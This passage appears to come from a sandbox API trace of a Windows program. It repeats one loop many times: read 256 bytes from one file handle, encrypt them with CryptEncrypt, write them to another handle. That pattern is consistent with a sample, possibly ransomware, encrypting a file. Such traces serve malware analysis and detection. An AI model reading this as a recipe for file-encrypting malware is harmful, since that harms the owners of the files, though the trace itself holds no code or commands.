lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.250] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.250] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.250] GetLastError () returned 0x0 [0167.250] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.250] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.250] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.250] GetLastError () returned 0x0 [0167.250] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.250] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.250] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.250] GetLastError () returned 0x0 [0167.250] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.250] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.250] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.250] GetLastError () returned 0x0 [0167.250] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.250] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.250] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.250] GetLastError () returned 0x0 [0167.250] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.250] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.250] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.250] GetLastError () returned 0x0 [0167.250] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.250] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.250] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.251] GetLastError () returned 0x0 [0167.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.251] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.251] GetLastError () returned 0x0 [0167.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.251] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.251] GetLastError () returned 0x0 [0167.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.251] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.251] GetLastError () returned 0x0 [0167.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.251] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.251] GetLastError () returned 0x0 [0167.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.251] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.251] GetLastError () returned 0x0 [0167.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.251] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.251] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.251] GetLastError () returned 0x0 [0167.251] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.252] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.252] GetLastError () returned 0x0 [0167.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.252] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.252] GetLastError () returned 0x0 [0167.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.252] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.252] GetLastError () returned 0x0 [0167.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.252] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.252] GetLastError () returned 0x0 [0167.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.252] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.252] GetLastError () returned 0x0 [0167.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.252] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.252] GetLastError () returned 0x0 [0167.252] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.252] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.253] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.253] GetLastError () returned 0x0 [0167.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.253] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.253] GetLastError () returned 0x0 [0167.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.253] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.253] GetLastError () returned 0x0 [0167.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.253] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.253] GetLastError () returned 0x0 [0167.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.253] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.253] GetLastError () returned 0x0 [0167.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.253] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.253] GetLastError () returned 0x0 [0167.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.253] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.253] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.253] GetLastError () returned 0x0 [0167.253] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.254] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.254] GetLastError () returned 0x0 [0167.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.254] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.254] GetLastError () returned 0x0 [0167.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.254] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.254] GetLastError () returned 0x0 [0167.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.254] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.254] GetLastError () returned 0x0 [0167.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.254] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.254] GetLastError () returned 0x0 [0167.254] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.254] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.254] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.254] GetLastError () returned 0x0 [0167.255] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 